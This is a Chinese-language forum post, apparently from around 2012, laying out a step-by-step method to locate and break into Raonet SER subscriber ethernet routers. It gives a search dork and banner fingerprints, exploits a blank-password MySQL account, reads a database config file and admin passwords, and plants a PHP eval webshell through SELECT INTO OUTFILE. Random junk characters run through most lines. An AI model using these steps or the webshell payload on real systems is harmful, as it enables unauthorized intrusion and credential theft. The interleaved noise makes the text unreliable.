寻找存在漏洞的路由器方法:" D$ }6 u* ^: @
& a7 W1 d3 h4 [- I9 z7 C1:google搜索'Raonet Subscriber Ethernet Router'- s. X# {+ w" `
& _! Q" K0 R. V( t2:使用WebDAVScan扫80端口,http banner为thttpd/2.21b 23apr2001; b8 E9 y# P: j( q v
- F5 r* |3 s. \2 j5 L! X: H: U3:扫mysql版本号判断,SER系列路由器使用的mysql版本4.0.14,默认有一个高权限的帐户mysql,口令为空。
% j" K1 ^- w* ~9 D+ H5 `- {( j) `! o) \2 q3 W, n
//还有很多方法可以批量获取,这里不发了,请自食其力 公开了大家都玩不成...... M2 |+ \& m! J5 E+ w5 g* [
; l8 [% D+ H' Q# c( l6 }) Q% V8 ~
1 {# y) X* A1 U) \ K1 Y* N L- l) O
入侵步骤:
2 r% \( V5 t9 ^1 K. ?! F9 I1 v. U5 G
1.爆web路径,http://www.yu1u.org/src/jpgraph_line.php) V3 u* @# I, N( \: {) {0 m
3 c+ C, p J' ~4 ]0 P/ ~$ V2:查看数据库配置文件,http://www.yu1u.org/inc/conn_db.inc
; G' I ~$ S: P4 M3:得到密码后连接,查看GUI管理密码:/ h% f& W7 W" J1 o
use ser_500
9 e5 J3 S0 [8 Y3 kselect id,passwd from user;
2 q9 l9 O' |$ t2 ]8 t* q& C% ?% {4:通过数据库写入webshell,执行命令:& T) q, k& _9 a j
use mysql;
# w0 d8 x, N5 O1 i8 K# [* icreate table ok(cmd TEXT);
9 L+ y8 u3 L7 \ L9 d+ ]insert into ok values("<?php @eval($_POST[cmd])?>");& v- O$ N$ B# J3 p% J# |: q# E' a
select * from ok into outfile "\/usr\/local\/www\/data\/src\/shell.php";
* |, i4 g6 W2 x8 [+ Z+ \drop table ok;3 F2 T2 V+ R. Q1 u1 d' t
* a( S/ n' p; E" G7 D' g+ T
5:连接后门shell.php & i' f/ @) l* |
5 s% M8 ]4 R/ R3 ? Z6. 搞定!
/ i8 w; f2 q& J+ D% f, s# S: @6 C$ u$ r4 J
|
发表于 2012-12-10 10:30:18
收藏
支持
反对
发表于 2013-7-27 20:06:50